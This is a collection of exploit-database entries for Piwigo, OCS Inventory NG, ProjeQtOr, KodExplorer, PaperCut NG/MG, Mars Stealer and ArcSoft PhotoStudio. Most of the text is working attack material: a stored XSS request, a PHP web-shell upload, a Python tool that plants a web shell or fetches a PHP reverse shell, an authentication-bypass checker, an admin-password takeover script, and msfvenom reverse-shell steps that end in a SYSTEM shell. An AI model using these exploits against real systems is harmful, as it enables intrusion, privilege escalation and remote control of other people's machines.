Exploit Title: Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS) Application: Piwigo Version: 13.6.0 Bugs: Stored XSS Technology: PHP Vendor URL: https://piwigo.org/ Software Link: https://piwigo.org/get-piwigo Date of found: 18.04.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1.After uploading the image, we write <img%20src=x%20onerror=alert(4)> instead of the tag(keyword) while editing the image) payload: <img%20src=x%20onerror=alert(4)> POST /piwigo/admin.php?page=photo-9 HTTP/1.1 Host: localhost Content-Length: 159 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/piwigo/admin.php?page=photo-9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: pwg_id=u7tjlue5o3vj7fbgb0ikodmb9m; phavsz=1394x860x1; pwg_display_thumbnail=display_thumbnail_classic; pwg_tags_per_page=100; phpbb3_ay432_k=; phpbb3_ay432_u=2; phpbb3_ay432_sid=9240ca5fb9f93c8ebc8ff7bd42c380fe Connection: close name=Untitled&author=&date_creation=&associate%5B%5D=1&tags%5B%5D=<img%20src=x%20onerror=alert(3)>&description=&level=0&pwg_token=bad904d2c7ec866bfba391bfc130ddd2&submit=Save+settings

##################################################################### # # # Exploit Title: OCS Inventory NG 2.3.0.0 - Unquoted Service Path # # Date: 2023/04/21 # # Exploit Author: msd0pe # # Vendor Homepage: https://oscinventory-ng.org # # Software Link: https://github.com/OCSInventory-NG/WindowsAgent # # My Github: https://github.com/msd0pe-1 # # Fixed in version 2.3.1.0 # # # ##################################################################### OCS Inventory NG Windows Agent: Versions below 2.3.1.0 contains an unquoted service path which allows attackers to escalate privileges to the system level. [1] Find the unquoted service path: > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ OCS Inventory Service OCS Inventory Service C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe Auto [2] Get informations about the service: > sc qc "OCS Inventory Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: OCS Inventory Service TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OCS Inventory Service DEPENDENCIES : RpcSs : EventLog : Winmgmt : Tcpip SERVICE_START_NAME : LocalSystem [3] Generate a reverse shell: > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o OCS.exe [4] Upload the revese shell to C:\Program Files (x86)\OCS.exe > put OCS.exe > ls drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 . drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 .. drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Common Files -rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 desktop.ini drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET drw-rw-rw- 0 Sat Apr 22 04:51:20 2023 OCS Inventory Agent -rw-rw-rw- 7168 Sat Apr 22 05:20:38 2023 OCS.exe drw-rw-rw- 0 Sat Apr 22 03:24:58 2023 Windows Defender drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Mail drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell [5] Start listener > nc -lvp 4444 [6] Reboot the service/server > sc stop "OCS Inventory Service" > sc start "OCS Inventory Service" OR > shutdown /r [7] Enjoy ! 192.168.1.102: inverse host lookup failed: Unknown host connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309 Microsoft Windows [Version 10.0.19045.2130] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system

Exploit Title: ProjeQtOr Project Management System 10.3.2 -Remote Code Execution (RCE) Application: ProjeQtOr Project Management System Version: 10.3.2 Bugs: Remote Code Execution (RCE) (Authenticated) via file upload Technology: PHP Vendor URL: https://www.projeqtor.org Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.3.2.zip/download Date of found: 19.04.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== Possible including php file with phar extension while uploading image. Rce is triggered when we visit again Payload:<?php echo system("id"); ?> poc request: POST /projeqtor/tool/saveAttachment.php?csrfToken= HTTP/1.1 Host: localhost Content-Length: 1177 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" Accept: application/json Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY0bpJaQzcvQberWR X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 sec-ch-ua-platform: "Linux" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/projeqtor/view/main.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: currency=USD; PHPSESSID=2mmnca4p7m93q1nmbg6alskiic Connection: close ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentFiles[]"; filename="miri.phar" Content-Type: application/octet-stream <?php echo system("id"); ?> ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentId" ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentRefType" User ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentRefId" 1 ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentType" file ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="MAX_FILE_SIZE" 10485760 ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentLink" ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentDescription" ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentPrivacy" 1 ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="uploadType" html5 ------WebKitFormBoundaryY0bpJaQzcvQberWR-- visit: http://localhost/projeqtor/files/attach/attachment_5/miri.phar

# Exploit Title: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload # Date: 21/04/2023 # Exploit Author: MrEmpy # Software Link: https://github.com/kalcaddle/KodExplorer # Version: <= 4.49 # Tested on: Linux # CVE ID: CVE-2022-4944 # References: # * https://vuldb.com/?id.227000 # * https://www.cve.org/CVERecord?id=CVE-2022-4944 # * https://github.com/MrEmpy/CVE-2022-4944 import argparse import http.server import socketserver import os import threading import requests from time import sleep def banner(): print(''' _ _____________ _____ _ ______ _____ _____ | | / / _ | _ \ ___| | | | ___ \/ __ \| ___| | |/ /| | | | | | | |____ ___ __ | | ___ _ __ ___ _ __ | |_/ /| / \/| |__ | \| | | | | | | __\ \/ / '_ \| |/ _ \| '__/ _ \ '__| | / | | | __| | |\ \ \_/ / |/ /| |___> <| |_) | | (_) | | | __/ | | |\ \ | \__/\| |___ \_| \_/\___/|___/ \____/_/\_\ .__/|_|\___/|_| \___|_| \_| \_| \____/\____/ | | |_| [KODExplorer <= v4.49 Remote Code Executon] [Coded by MrEmpy] ''') def httpd(): port = 8080 httpddir = os.path.join(os.path.dirname(__file__), 'http') os.chdir(httpddir) Handler = http.server.SimpleHTTPRequestHandler httpd = socketserver.TCPServer(('', port), Handler) print('[+] HTTP Server started') httpd.serve_forever() def webshell(url, lhost): payload = '<pre><?php system($_GET["cmd"])?></pre>' path = '/data/User/admin/home/' targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ') wshell_f = open('http/shell.php', 'w') wshell_f.write(payload) wshell_f.close() print('[*] Opening HTTPd port') th = threading.Thread(target=httpd) th.start() print(f'[+] Send this URI to your target: {url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http:// {lhost}:8080/shell.php&uuid=&time=') print(f'[+] After the victim opens the URI, his shell will be hosted at {url}/data/User/admin/home/shell.php?cmd=whoami') def reverseshell(url, lhost): rvpayload = ' https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php ' path = '/data/User/admin/home/' targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ') lport = input('[*] Your local port: ') reqpayload = requests.get(rvpayload).text reqpayload = reqpayload.replace('127.0.0.1', lhost) reqpayload = reqpayload.replace('1234', lport) wshell_f = open('http/shell.php', 'w') wshell_f.write(reqpayload) wshell_f.close() print('[*] Opening HTTPd port') th = threading.Thread(target=httpd) th.start() print(f'[+] Send this URI to your target: {url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http:// {lhost}:8080/shell.php&uuid=&time=') input(f'[*] Run the command "nc -lnvp {lport}" to receive the connection and press any key\n') while True: hitshell = requests.get(f'{url}/data/User/admin/home/shell.php') sleep(1) if not hitshell.status_code == 200: continue else: print('[+] Shell sent and executed!') break def main(url, lhost, mode): banner() if mode == 'webshell': webshell(url, lhost) elif mode == 'reverse': reverseshell(url, lhost) else: print('[-] There is no such mode. Use webshell or reverse') if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('-u','--url', action='store', help='target url', dest='url', required=True) parser.add_argument('-lh','--local-host', action='store', help='local host', dest='lhost', required=True) parser.add_argument('-m','--mode', action='store', help='mode (webshell, reverse)', dest='mode', required=True) arguments = parser.parse_args() main(arguments.url, arguments.lhost, arguments.mode)

# Exploit Title: PaperCut NG/MG 22.0.4 - Authentication Bypass # Date: 21 April 2023 # Exploit Author: MaanVader # Vendor Homepage: https://www.papercut.com/ # Version: 8.0 or later # Tested on: 22.0.4 # CVE: CVE-2023-27350 import requests from bs4 import BeautifulSoup import re def vuln_version(): ip = input("Enter the ip address: ") url = "http://"+ip+":9191"+"/app?service=page/SetupCompleted" response = requests.get(url) soup = BeautifulSoup(response.text, 'html.parser') text_div = soup.find('div', class_='text') product_span = text_div.find('span', class_='product') # Search for the first span element containing a version number version_span = None for span in text_div.find_all('span'): version_match = re.match(r'^\d+\.\d+\.\d+$', span.text.strip()) if version_match: version_span = span break if version_span is None: print('Not Vulnerable') else: version_str = version_span.text.strip() print('Version:', version_str) print("Vulnerable version") print(f"Step 1 visit this url first in your browser: {url}") print(f"Step 2 visit this url in your browser to bypass the login page : http://{ip}:9191/app?service=page/Dashboard") if __name__ =="__main__": vuln_version()

# Exploit Title: Mars Stealer 8.3 - Admin Account Takeover # Product: Mars Stelaer # Technology: PHP # Version: < 8.3 # Google Dork: N/A # Date: 20.04.2023 # Tested on: Linux # Author: Sköll - twitter.com/s_k_o_l_l import argparse import requests parser = argparse.ArgumentParser(description='Mars Stealer Account Takeover Exploit') parser.add_argument('-u', '--url', required=True, help='Example: python3 exploit.py -u http://localhost/') args = parser.parse_args() url = args.url.rstrip('/') + '/includes/settingsactions.php' headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Sköll", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": url, "Referer": url, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US;q=0.8,en;q=0.7"} data = {"func": "savepwd", "pwd": "sköll"} #change password response = requests.post(url, headers=headers, data=data) if response.status_code == 200: print("Succesfull!") print("New Password: " + data["pwd"]) else: print("Exploit Failed!")

########################################################################## # # # Exploit Title: Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path # # Date: 2023/04/22 # # Exploit Author: msd0pe # # Vendor Homepage: https://www.arcsoft.com/ # # My Github: https://github.com/msd0pe-1 # # # ########################################################################## Arcsoft PhotoStudio: Versions =< 6.0.0.172 contains an unquoted service path which allows attackers to escalate privileges to the system level. [1] Find the unquoted service path: > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ ArcSoft Exchange Service ADExchange C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe Auto [2] Get informations about the service: > sc qc "ADExchange" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ADExchange TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ArcSoft Exchange Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem [3] Generate a reverse shell: > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Common.exe [4] Upload the reverse shell to C:\Program Files (x86)\Common.exe > put Commom.exe > ls drw-rw-rw- 0 Sun Apr 23 04:10:25 2023 . drw-rw-rw- 0 Sun Apr 23 04:10:25 2023 .. drw-rw-rw- 0 Sun Apr 23 03:55:37 2023 ArcSoft drw-rw-rw- 0 Sun Apr 23 03:55:36 2023 Common Files -rw-rw-rw- 7168 Sun Apr 23 04:10:25 2023 Common.exe -rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 desktop.ini drw-rw-rw- 0 Sun Apr 23 03:55:36 2023 InstallShield Installation Information drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET drw-rw-rw- 0 Sat Apr 22 05:48:20 2023 Windows Defender drw-rw-rw- 0 Sat Apr 22 05:46:44 2023 Windows Mail drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell [5] Start listener > nc -lvp 4444 [6] Reboot the service/server > sc stop "ADExchange" > sc start "ADExchange" OR > shutdown /r [7] Enjoy ! 192.168.1.102: inverse host lookup failed: Unknown host connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309 Microsoft Windows [Version 10.0.19045.2130] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system